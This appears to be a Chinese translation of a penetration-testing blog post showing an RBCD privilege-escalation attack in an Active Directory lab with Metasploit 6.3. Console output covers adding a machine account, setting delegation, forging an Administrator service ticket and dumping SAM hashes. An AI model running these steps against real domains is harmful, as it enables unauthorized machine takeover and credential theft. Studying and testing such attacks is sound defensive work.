本文为翻译文章,有需要的师傅可以直接点击阅读原文,查看原文。
Metasploit最近发布了6.3版本。它带来了一大批与LDAP操作和使用Kerberos认证有关的新功能。以下是MSF官网公告:
Metasploit Framework 6.3现已发布🎉。
新功能包括本地Kerberos认证支持、简化的活动目录攻击工作流程(AD CS、AD DS),以及请求、伪造和转换不同格式票据的新模块。
- Metasploit项目(@metasploit) 2023年1月30日
在这篇博客中,我想演示一下如何使用GenericWrite权限进行RBCD攻击,我发现这种攻击非常普遍。通常情况下,一个用户没有计算机的管理权限,但对计算机有通用写权限或类似的权限(通用所有、Owns等)。通过利用这种配置,就有可能获得计算机的管理权限。目前有两种主要的方法来执行这种攻击,要么使用Rubeus/Powermad/Powerview的组合,要么使用Impacket中的各种脚本。
为了解释一些新的功能,我将把Metasploit内的模块与Impacket的对应模块进行比较。
首先,要进行这种攻击,你将需要一个计算机账户。 如果你没有一个在你控制之下的账户,你将需要创建一个。在Impacket中,我们将使用addcomputer.py,但在这里我们将使用auxiliary/admin/dcerpc/samr_computer。
msf6 auxiliary(admin/dcerpc/samr_computer)> show optionsModule options (auxiliary/admin/dcerpc/samr_computer):Name Current Setting Required Description--------------- -------- -----------COMPUTER_NAME no The computer nameRHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 445 yes The target port (TCP)SMBDomain n00py.local no The Windows domain to use for authenticationSMBPass Password1 no The password for the specified usernameSMBUser n00py no The username to authenticate asWhen ACTION is ADD_COMPUTER:Name Current Setting Required Description--------------- -------- -----------COMPUTER_PASSWORD no The password for the new computerAuxiliary action:Name Description-----------ADD_COMPUTER Add a computer accountView the full module info with the info, or info -d command.msf6 auxiliary(admin/dcerpc/samr_computer) > runRunning module against 172.16.73.6172.16.73.6:445 - Successfully created n00py.localDESKTOP-MKFA61G6$172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135Auxiliary module execution completed
一旦你获得了一个新的计算机账户,我们就必须在受害者计算机上配置授权权限。 在Impacket中我们会使用rbcd.py,但在这里我们将使用auxiliary/admin/ldap/rbcd。
msf6 auxiliary(admin/ldap/rbcd) > show optionsModule options (auxiliary/admin/ldap/rbcd):Name Current Setting Required Description---- --------------- -------- -----------DELEGATE_FROM DESKTOP-MKFA61G6$ no The delegation sourceDELEGATE_TO WIN-27M967MQJL4$ yes The delegation targetDOMAIN n00py.local no The domain to authenticate toPASSWORD Password1 no The password to authenticate withRHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 389 yes The target portSSL false no Enable SSL on the LDAP connectionUSERNAME n00py no The username to authenticate withView the full module info with the info, or info -d command.msf6 auxiliary(admin/ldap/rbcd) > read[*] Running module against 172.16.73.6[+] Successfully bound to the LDAP server![*] Discovering base DN automatically[*] 172.16.73.6:389 Getting root DSE[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.[*] Auxiliary module execution completedmsf6 auxiliary(admin/ldap/rbcd) > write[*] Running module against 172.16.73.6[+] Successfully bound to the LDAP server![*] Discovering base DN automatically[*] 172.16.73.6:389 Getting root DSE[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.[*] Added account:[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)[*] Auxiliary module execution completedmsf6 auxiliary(admin/ldap/rbcd) > read[*] Running module against 172.16.73.6[+] Successfully bound to the LDAP server![*] Discovering base DN automatically[*] 172.16.73.6:389 Getting root DSE[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local[*] Allowed accounts:[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)[*] Auxiliary module execution completed
一旦我们配置了委派,我们就可以为任何用户申请服务票据。 在Impacket中,我们将使用getST.py,但在这里我们将使用auxiliary/admin/kerberos/get_ticket。我们要使用Metasploit去保存最后的服务票据。
msf6 auxiliary(admin/kerberos/get_ticket) > show optionsModule options (auxiliary/admin/kerberos/get_ticket):Name Current Setting Required Description--------------- -------- -----------AES_KEY no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bitsCERT_FILE no The PKCS12 (.pfx) certificate file to authenticate withCERT_PASSWORD no The certificate file's passwordDOMAIN n00py.local no The Fully Qualified Domain Name (FQDN). Ex: mydomain.localNTHASH no The NT hash in hex string. Server must support RC4PASSWORD 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj no The domain user's passwordRHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 88 yes The target portTimeout 10 yes The TCP timeout to establish Kerberos connection and read dataUSERNAME DESKTOP-MKFA61G6$ no The domain userWhen ACTION is GET_TGS:Name Current Setting Required Description--------------- -------- -----------IMPERSONATE Administrator no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)SPN CIFS/WIN-27M967MQJL4.n00py.local no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.localAuxiliary action:Name Description-----------GET_TGS Request a Ticket-Granting-Service (TGS)View the full module info with the info, or info -d command.msf6 auxiliary(admin/kerberos/get_ticket) > set verbose trueverbose => truemsf6 auxiliary(admin/kerberos/get_ticket) > runRunning module against 172.16.73.6172.16.73.6:88 - Received a valid TGT-Response172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin172.16.73.6:88 - Getting TGS impersonating [email protected] (SPN: CIFS/WIN-27M967MQJL4.n00py.local)172.16.73.6:88 - Received a valid TGS-Response172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin172.16.73.6:88 - Received a valid TGS-Response172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.binAuxiliary module execution completed
最后,一旦我们有了这个票据,我们就可以对目标进行管理操作。通常情况下,会使用Impacket的secretsdump.py或CrackMapExec,从系统中提取hash。我们可以使用Metasploit的auxiliary/gather/windows_secrets_dump模块来代替,这相当于在CrackMapExec中同时运行-sam和-lsa。这里唯一棘手的部分是让它与Kerberos认证一起工作,这需要进入高级选项。
msf6 auxiliary(gather/windows_secrets_dump) > show optionsModule options (auxiliary/gather/windows_secrets_dump):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS 172.16.73.12 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 445 yes The target port (TCP)SMBDomain n00py.local no The Windows domain to use for authenticationSMBPass no The password for the specified usernameSMBUser Administrator no The username to authenticate asAuxiliary action:Name Description---- -----------ALL Dump everythingView the full module info with the info, or info -d command.msf6 auxiliary(gather/windows_secrets_dump) > show advancedModule advanced options (auxiliary/gather/windows_secrets_dump):Name Current Setting Required Description---- --------------- -------- -----------[TRUNCATED]SMB::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)[TRUNCATED]Active when SMB::Auth is kerberos:Name Current Setting Required Description---- --------------- -------- -----------DomainControllerRhost WIN-NDA9607EHKS.n00py.local no The resolvable rhost for the Domain ControllerKrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)SMB::Krb5Ccname /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin no The ccache file to use for kerberos authenticationSMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 yes Kerberos encryption types to offerSMB::Rhostname WIN-27M967MQJL4.n00py.local no The rhostname which is required for kerberos - the SPNView the full module info with the info, or info -d command.msf6 auxiliary(gather/windows_secrets_dump) > run[*] Running module against 172.16.73.12[*] 172.16.73.12:445 - Opening Service Control Manager[*] 172.16.73.12:445 - Binding to svcctl...[+] 172.16.73.12:445 - Bound to svcctl[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state[*] 172.16.73.12:445 - Starting service...[*] 172.16.73.12:445 - Retrieving target system bootKey[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaJD[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaSkew1[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaGBG[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaData[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76[*] 172.16.73.12:445 - Checking NoLMHash policy[*] 172.16.73.12:445 - LMHashes are not being stored[*] 172.16.73.12:445 - Saving remote SAM database[*] 172.16.73.12:445 - Create SAM key[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp[*] 172.16.73.12:445 - Dumping SAM hashes[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM[*] 172.16.73.12:445 - Password hints:No users with password hints on this system[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::[TRUNCATED][*] Auxiliary module execution completed
至此整个过程结束。
原文始发于微信公众号(鸿鹄实验室):【翻译】使用MSF进行RBCD攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论